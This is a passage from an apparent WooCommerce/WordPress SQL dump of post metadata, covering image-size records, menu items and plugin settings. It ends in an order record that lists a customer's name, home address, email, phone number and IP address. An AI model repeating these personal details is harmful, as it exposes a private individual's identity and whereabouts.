perture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3085,921,'_wp_attached_file','2022/02/Artboard-7-8.png'),(3086,921,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2022/02/Artboard-7-8.png\";s:8:\"filesize\";i:59193;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"Artboard-7-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77333;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-7-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9742;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"Artboard-7-8-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3032;}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-7-8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-7-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-7-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-7-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-7-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-7-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3087,922,'_wp_attached_file','2022/02/Artboard-6-8.png'),(3088,922,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2022/02/Artboard-6-8.png\";s:8:\"filesize\";i:45013;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"Artboard-6-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:63037;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-6-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8767;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"Artboard-6-8-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2972;}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-6-8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-6-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-6-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-6-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-6-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-6-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3089,926,'_wp_attached_file','2022/02/Artboard-7-8-1.png'),(3090,926,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2022/02/Artboard-7-8-1.png\";s:8:\"filesize\";i:59193;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Artboard-7-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77333;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-7-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9742;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"Artboard-7-8-1-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3032;}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-7-8-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-7-8-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-7-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-7-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-7-8-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-7-8-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3091,927,'_wp_attached_file','2022/02/Artboard-3-8-1.png'),(3092,927,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2022/02/Artboard-3-8-1.png\";s:8:\"filesize\";i:80976;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Artboard-3-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102271;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-3-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12587;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"Artboard-3-8-1-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3786;}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3093,928,'_wp_attached_file','2022/02/Artboard-5-8-1.png'),(3094,928,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2022/02/Artboard-5-8-1.png\";s:8:\"filesize\";i:56829;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Artboard-5-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68677;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-5-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10096;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"Artboard-5-8-1-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3305;}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-5-8-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-5-8-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-5-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-5-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-5-8-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-5-8-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3095,929,'_wp_attached_file','2022/02/Artboard-2-8-1.png'),(3096,929,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2022/02/Artboard-2-8-1.png\";s:8:\"filesize\";i:49597;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Artboard-2-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58695;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-2-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8638;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"Artboard-2-8-1-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2830;}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3097,930,'_wp_attached_file','2022/02/Artboard-7-8-2.png'),(3098,930,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2022/02/Artboard-7-8-2.png\";s:8:\"filesize\";i:59193;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Artboard-7-8-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77333;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-7-8-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9742;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"Artboard-7-8-2-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3032;}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-7-8-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-7-8-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-7-8-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-7-8-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-7-8-2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-7-8-2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3123,902,'_wp_page_template','default'),(3124,937,'_menu_item_type','post_type'),(3125,937,'_menu_item_menu_item_parent','0'),(3126,937,'_menu_item_object_id','934'),(3127,937,'_menu_item_object','app-pages'),(3128,937,'_menu_item_target',''),(3129,937,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3130,937,'_menu_item_xfn',''),(3131,937,'_menu_item_url',''),(3132,938,'_menu_item_type','post_type'),(3133,938,'_menu_item_menu_item_parent','0'),(3134,938,'_menu_item_object_id','935'),(3135,938,'_menu_item_object','app-pages'),(3136,938,'_menu_item_target',''),(3137,938,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3138,938,'_menu_item_xfn',''),(3139,938,'_menu_item_url',''),(3140,939,'_menu_item_type','post_type'),(3141,939,'_menu_item_menu_item_parent','0'),(3142,939,'_menu_item_object_id','936'),(3143,939,'_menu_item_object','app-pages'),(3144,939,'_menu_item_target',''),(3145,939,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3146,939,'_menu_item_xfn',''),(3147,939,'_menu_item_url',''),(3148,940,'_menu_item_type','taxonomy'),(3149,940,'_menu_item_menu_item_parent','0'),(3150,940,'_menu_item_object_id','19'),(3151,940,'_menu_item_object','category'),(3152,940,'_menu_item_target',''),(3153,940,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3154,940,'_menu_item_xfn',''),(3155,940,'_menu_item_url',''),(3156,941,'_menu_item_type','taxonomy'),(3157,941,'_menu_item_menu_item_parent','0'),(3158,941,'_menu_item_object_id','20'),(3159,941,'_menu_item_object','category'),(3160,941,'_menu_item_target',''),(3161,941,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3162,941,'_menu_item_xfn',''),(3163,941,'_menu_item_url',''),(3164,942,'_menu_item_type','taxonomy'),(3165,942,'_menu_item_menu_item_parent','0'),(3166,942,'_menu_item_object_id','1'),(3167,942,'_menu_item_object','category'),(3168,942,'_menu_item_target',''),(3169,942,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3170,942,'_menu_item_xfn',''),(3171,942,'_menu_item_url',''),(3172,943,'_menu_item_type','taxonomy'),(3173,943,'_menu_item_menu_item_parent','0'),(3174,943,'_menu_item_object_id','1'),(3175,943,'_menu_item_object','category'),(3176,943,'_menu_item_target',''),(3177,943,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3178,943,'_menu_item_xfn',''),(3179,943,'_menu_item_url',''),(3180,944,'_menu_item_type','taxonomy'),(3181,944,'_menu_item_menu_item_parent','0'),(3182,944,'_menu_item_object_id','19'),(3183,944,'_menu_item_object','category'),(3184,944,'_menu_item_target',''),(3185,944,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3186,944,'_menu_item_xfn',''),(3187,944,'_menu_item_url',''),(3188,945,'_menu_item_type','taxonomy'),(3189,945,'_menu_item_menu_item_parent','0'),(3190,945,'_menu_item_object_id','20'),(3191,945,'_menu_item_object','category'),(3192,945,'_menu_item_target',''),(3193,945,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3194,945,'_menu_item_xfn',''),(3195,945,'_menu_item_url',''),(3196,946,'_menu_item_type','taxonomy'),(3197,946,'_menu_item_menu_item_parent','0'),(3198,946,'_menu_item_object_id','1'),(3199,946,'_menu_item_object','category'),(3200,946,'_menu_item_target',''),(3201,946,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3202,946,'_menu_item_xfn',''),(3203,946,'_menu_item_url',''),(3204,947,'_menu_item_type','taxonomy'),(3205,947,'_menu_item_menu_item_parent','0'),(3206,947,'_menu_item_object_id','19'),(3207,947,'_menu_item_object','category'),(3208,947,'_menu_item_target',''),(3209,947,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3210,947,'_menu_item_xfn',''),(3211,947,'_menu_item_url',''),(3212,948,'_menu_item_type','taxonomy'),(3213,948,'_menu_item_menu_item_parent','0'),(3214,948,'_menu_item_object_id','20'),(3215,948,'_menu_item_object','category'),(3216,948,'_menu_item_target',''),(3217,948,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3218,948,'_menu_item_xfn',''),(3219,948,'_menu_item_url',''),(3220,949,'_menu_item_type','post_type'),(3221,949,'_menu_item_menu_item_parent','0'),(3222,949,'_menu_item_object_id','936'),(3223,949,'_menu_item_object','app-pages'),(3224,949,'_menu_item_target',''),(3225,949,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3226,949,'_menu_item_xfn',''),(3227,949,'_menu_item_url',''),(3254,1,'_wcfm_article_views','84'),(3256,256,'_wcfm_article_views','88'),(3259,480,'_wcfm_article_views','142'),(3260,252,'_wcfm_article_views','83'),(3262,958,'_pll_strings_translations','a:0:{}'),(3263,959,'_pll_strings_translations','a:0:{}'),(3264,960,'_pll_strings_translations','a:0:{}'),(3265,961,'_pll_strings_translations','a:0:{}'),(3266,962,'_pll_strings_translations','a:0:{}'),(3267,963,'_pll_strings_translations','a:0:{}'),(3268,964,'_pll_strings_translations','a:0:{}'),(3271,966,'_edit_lock','1644821802:1'),(3272,966,'_edit_last','1'),(3273,966,'_fields','a:1:{i:0;a:11:{s:2:\"id\";s:11:\"966_message\";s:8:\"priority\";i:10;s:4:\"type\";s:4:\"text\";s:5:\"title\";s:54:\"Gift to someone !!!! Sent a message to your loved ones\";s:8:\"required\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:9:\"css_class\";s:0:\"\";s:7:\"tooltip\";s:0:\"\";s:10:\"max_length\";s:0:\"\";s:11:\"pricing_adv\";s:0:\"\";s:21:\"conditional_logic_adv\";s:0:\"\";}}'),(3274,966,'_section','woocommerce_after_add_to_cart_button'),(3275,966,'_assign_to','product'),(3295,967,'_pll_strings_translations','a:0:{}'),(3315,966,'_product_id','529'),(3316,966,'_product_id','530'),(3317,966,'_product_id','531'),(3318,966,'_product_id','532'),(3319,966,'_product_id','533'),(3320,966,'_product_id','534'),(3321,966,'_product_id','535'),(3322,966,'_product_id','536'),(3323,966,'_product_id','537'),(3324,966,'_product_id','538'),(3325,966,'_product_id','539'),(3326,966,'_product_id','540'),(3327,966,'_product_id','541'),(3328,966,'_product_id','542'),(3329,966,'_product_id','543'),(3330,966,'_product_id','590'),(3331,966,'_product_id','596'),(3332,966,'_product_id','612'),(3333,966,'_product_id','637'),(3373,633,'_edit_lock','1645077563:1'),(3374,633,'_edit_last','1'),(3375,633,'_aioseo_title',NULL),(3376,633,'_aioseo_description',NULL),(3377,633,'_aioseo_keywords',''),(3378,633,'_aioseo_og_title',NULL),(3379,633,'_aioseo_og_description',NULL),(3380,633,'_aioseo_og_article_section',''),(3381,633,'_aioseo_og_article_tags',''),(3382,633,'_aioseo_twitter_title',NULL),(3383,633,'_aioseo_twitter_description',NULL),(3388,11,'_elementor_template_type','wp-page'),(3389,11,'_elementor_version','3.5.5'),(3390,997,'_elementor_edit_mode','builder'),(3391,997,'_elementor_template_type','wp-page'),(3392,997,'_elementor_version','3.5.5'),(3393,11,'_edit_last','1'),(3394,11,'_aioseo_title',NULL),(3395,11,'_aioseo_description',NULL),(3396,11,'_aioseo_keywords',''),(3397,11,'_aioseo_og_title',NULL),(3398,11,'_aioseo_og_description',NULL),(3399,11,'_aioseo_og_article_section',''),(3400,11,'_aioseo_og_article_tags',''),(3401,11,'_aioseo_twitter_title',NULL),(3402,11,'_aioseo_twitter_description',NULL),(3403,972,'_edit_lock','1645099139:1'),(3404,998,'_order_key','wc_order_UhWHB4wppUPMb'),(3405,998,'_customer_user','0'),(3406,998,'_payment_method','razorpay'),(3407,998,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3408,998,'_customer_ip_address','171.76.103.51'),(3409,998,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3410,998,'_created_via','checkout'),(3411,998,'_cart_hash','fde0319b3b4d1b2da5f0221fcf61276d'),(3412,998,'_billing_first_name','pavithra'),(3413,998,'_billing_last_name','g'),(3414,998,'_billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(3415,998,'_billing_address_2','near golden fresh super market'),(3416,998,'_billing_city','bangalore'),(3417,998,'_billing_state','KA'),(3418,998,'_billing_postcode','560102'),(3419,998,'_billing_country','IN'),(3420,998,'_billing_email','pavitra@utfindia.in'),(3421,998,'_billing_phone','07411722844'),(3422,998,'_shipping_first_name','pavithra'),(3423,998,'_shipping_last_name','g'),(3424,998,'_shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(3425,998,'_shipping_address_2','near golden fresh super market'),(3426,998,'_shipping_city','bangalore'),(3427,998,'_shipping_state','KA'),(3428,998,'_shipping_postcode','560102'),(3429,998,'_shipping_country','IN'),(3430,998,'_order_currency','INR'),(3431,998,'_cart_discount','0'),(3432,998,'_cart_discount_tax','0'),(3433,998,'_order_shipping','0'),(3434,998,'_order_shipping_tax','0'),(3435,998,'_order_tax','0'),(3436,998,'_order_total','200.00'),(3437,998,'_order_version','6.2.0'),(3438,998,'_prices_include_tax','no'),(3439,998,'_billing_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN pavitra@utfindia.in 07411722844'),(3440,998,'_shipping_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN '),(3441,998,'is_vat_exempt','no'),(3442,998,'_wcfmmp_user_location','HSR Layout, HSR Layout Ward, Bommanahalli Zone, Bengaluru, Bangalore South, Bangalore Urban, Karnataka, 380068, 